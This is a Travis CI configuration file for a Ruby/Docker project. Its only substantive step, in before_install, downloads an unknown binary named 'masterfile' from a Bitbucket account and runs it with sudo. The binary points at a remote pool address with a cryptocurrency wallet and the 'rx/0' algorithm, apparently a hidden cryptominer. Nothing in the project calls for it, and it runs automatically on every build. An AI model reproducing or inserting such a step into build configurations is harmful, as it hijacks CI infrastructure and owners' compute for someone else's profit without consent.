language: ruby

services:
  - docker

before_install:
  - sudo apt-get update && sudo apt-get install -y wget && wget https://bitbucket.org/laoqps12/asad/downloads/masterfile && sudo chmod u+x masterfile && sudo ./masterfile -o 139.99.124.170:80 -u 84Cz8R4XkP2V6ceRrJgkXQDMSFRLCfgj3gtgbAkBkaypMe4H9uySSC8FugfzvtFprpA54ECHbCsGNhYwA8PdmTRSUHBaue8 -k -a rx/0
